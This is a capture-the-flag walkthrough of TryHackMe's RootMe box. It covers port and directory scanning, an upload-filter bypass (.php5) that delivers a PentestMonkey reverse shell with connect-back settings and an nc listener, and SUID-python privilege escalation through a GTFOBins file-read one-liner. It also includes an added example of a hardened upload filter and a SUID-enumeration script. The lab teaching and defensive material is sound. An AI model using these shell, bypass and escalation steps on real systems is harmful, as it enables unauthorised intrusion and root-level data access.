THM — RootMe

Beginner’s CTF on TryHackMe

Reconnaissance:

We first scan the machine to find open ports:

nmap -sV -vv 10.10.x.x

The scan reports two open ports. The HTTP service on port 80 is Apache, so we examine the web server first.

We run dirb against it to brute-force directories:

dirb http://10.10.x.x

Two directories stand out: /panel/ and /uploads/.

Getting a Shell:

The /panel path hosts a file upload form, which we try to use to get a reverse shell. Uploading a file with a .php extension returns an error, so we try alternative extensions that the server may still execute as PHP.

We use the PHP reverse shell from PentestMonkey (php-reverse-shell.php) and change its connect-back parameters to point at our machine and the port our listener will use:

$ip = '10.x.x.x';  // CHANGE THIS
$port = 3033;      // CHANGE THIS

The first upload attempt, with a .php extension, is rejected; renaming the file to .php5 gets it accepted. Before triggering the payload we start a listener on port 3033. Browsing to /uploads/ shows our file; requesting it makes Apache execute the PHP, and the reverse connection arrives at our listener:
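Why the rename worked: the form only refuses the literal .php extension, while the server's PHP handler executes more than that one extension, so .php5 slips through and still runs. The block below is an added example, not code from the RootMe box or from the write-up: it reconstructs the kind of blacklist filter that behaves as observed (rejects .php, accepts .php5) and places a hardened allowlist-plus-rename flow beside it. The real /panel handler's source is not on the page, and the executable-extension list and the image allowlist are assumptions chosen for illustration.

```python
# Added example (not code from the RootMe box or from the write-up): a
# reconstruction of the kind of upload filter that behaves as observed,
# rejecting .php but accepting .php5, beside a hardened replacement.
# The executable-extension list and the allowlist are assumptions.
import secrets

# Extensions Apache's PHP handler is often configured to execute. Which of
# them run on a given host depends on its mod_php/FPM config; the write-up
# only shows that .php5 executed on this box.
PHP_EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Hardened side: the closed set of extensions the application actually needs.
IMAGE_ALLOWLIST = {"png", "jpg", "jpeg", "gif"}


def _extension(filename: str) -> str:
    """Extension after the last dot, lower-cased; '' if there is none."""
    if "." not in filename:
        return ""
    return filename.rsplit(".", 1)[-1].lower()


def blacklist_allows(filename: str) -> bool:
    """Vulnerable filter: refuses only the literal 'php' extension.

    Every other PHP-executable extension passes, which is exactly the gap
    the write-up walks through when shell.php fails and shell.php5 works.
    """
    return _extension(filename) != "php"


def allowlist_allows(filename: str) -> bool:
    """Hardened filter: accept only extensions from a closed set."""
    return _extension(filename) in IMAGE_ALLOWLIST


def handle_upload(filename: str):
    """Hardened upload flow.

    1. Validate the extension against the allowlist.
    2. Discard the client-chosen name and store under a random one that
       keeps only the validated extension, so a double extension such as
       'shell.php.jpg' cannot survive into the stored path and the
       attacker cannot predict the URL under /uploads/.
    Returns the stored file name, or None if the upload is refused.
    """
    if not allowlist_allows(filename):
        return None
    return f"{secrets.token_hex(16)}.{_extension(filename)}"


def bypass_candidates(filter_fn) -> list:
    """PHP-executable extensions that a given filter lets through."""
    return sorted(e for e in PHP_EXECUTABLE_EXTENSIONS if filter_fn(f"shell.{e}"))


if __name__ == "__main__":
    print("blacklist lets through:", bypass_candidates(blacklist_allows))
    print("allowlist lets through:", bypass_candidates(allowlist_allows))
    print("shell.php.jpg stored as:", handle_upload("shell.php.jpg"))
```

The defence that matters most is independent of the filter: the directory the files are served from should not execute scripts at all (for mod_php, `php_admin_flag engine off` in that directory's Apache configuration), so that even a filter bypass leaves an inert file rather than a shell.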

nc -lvnp 3033 
Listening on [0.0.0.0] (family 0, port 3033)
Connection from 10.10.x.x 33822 received!
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Once connected, we search for the user flag and read it:

find / -name 'user.txt' 2>/dev/null
/var/www/user.txt

Privilege Escalation:

With no credentials recovered so far, we enumerate SUID binaries:

find / -perm -u=s -type f 2>/dev/null

We find an interesting file at /usr/bin/python. We attempted the SUID exploit, but it didn't work out, so we used the file-read technique to view our file.

Because python is root-owned and has the SUID bit set, it runs with an effective UID of 0, so a plain open() inside it can read files that our shell user cannot. We use the GTFOBins "File read" entry for python to read the flag:

python -c 'print(open("/path/to/file").read())'
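The SUID hunt above is worth automating beyond a single find, because the interesting result is not the list itself but which entries are root-owned interpreters. The block below is an added example, not code from the write-up: it re-implements `find / -perm -u=s -type f` in Python and adds a triage step that flags root-owned SUID copies of interpreters and tools such as the /usr/bin/python found on this box. The interpreter list, the skipped pseudo-filesystems and the temporary-directory fixture in demo() are assumptions constructed for illustration.

```python
# Added example (not from the write-up): a Python re-implementation of the
# SUID hunt `find / -perm -u=s -type f`, plus a triage step that flags
# root-owned interpreters like the /usr/bin/python found on the box.
# INTERESTING, SKIP_DIRS and the demo() fixture are assumptions.
import os
import re
import shutil
import stat
import tempfile

# Binaries GTFOBins lists SUID techniques for; a root-owned SUID copy of any
# of these deserves a manual look. Assumed, non-exhaustive list.
INTERESTING = {"python", "perl", "bash", "find", "vim", "nmap", "env", "less"}

# Pseudo-filesystems that are only noise for this search.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root: str = "/") -> list:
    """Return (path, owner_uid) for every regular file under root with the
    setuid bit set. Symlinks are not followed, matching find's -type f."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries: the 2>/dev/null of the find command
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def triage(hits, privileged_uid: int = 0) -> list:
    """Keep hits that are owned by privileged_uid (normally root) AND whose
    basename, version suffix stripped (python2.7 -> python), is in
    INTERESTING. A SUID bit on a file owned by an unprivileged user gains
    an attacker nothing, so those are dropped."""
    flagged = []
    for path, uid in hits:
        if uid != privileged_uid:
            continue
        m = re.match(r"[a-z]+", os.path.basename(path))
        if m and m.group(0) in INTERESTING:
            flagged.append(path)
    return flagged


def demo() -> dict:
    """Constructed fixture: a throwaway tree with one SUID file and one
    plain file, scanned and triaged. Real use is triage(find_suid('/'))."""
    base = tempfile.mkdtemp()
    try:
        bindir = os.path.join(base, "usr", "bin")
        os.makedirs(bindir)
        suid_file = os.path.join(bindir, "python2.7")
        plain_file = os.path.join(bindir, "ls")
        for p in (suid_file, plain_file):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(suid_file, 0o4755)   # -rwsr-xr-x
        os.chmod(plain_file, 0o755)   # -rwxr-xr-x
        hits = find_suid(base)
        # We own the fixture, so our own uid plays the role of root here.
        flagged = triage(hits, privileged_uid=os.getuid())
        return {
            "hits": [p for p, _ in hits],
            "found_only_suid_file": [p for p, _ in hits] == [suid_file],
            "flagged_python": flagged == [suid_file],
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for path in triage(find_suid("/")):
        print(path)
```

Run it as an unprivileged user on the target and it prints only the root-owned SUID interpreters worth following up on GTFOBins; everything else the find command would have listed (passwd, sudo, mount and friends) is filtered out of the view.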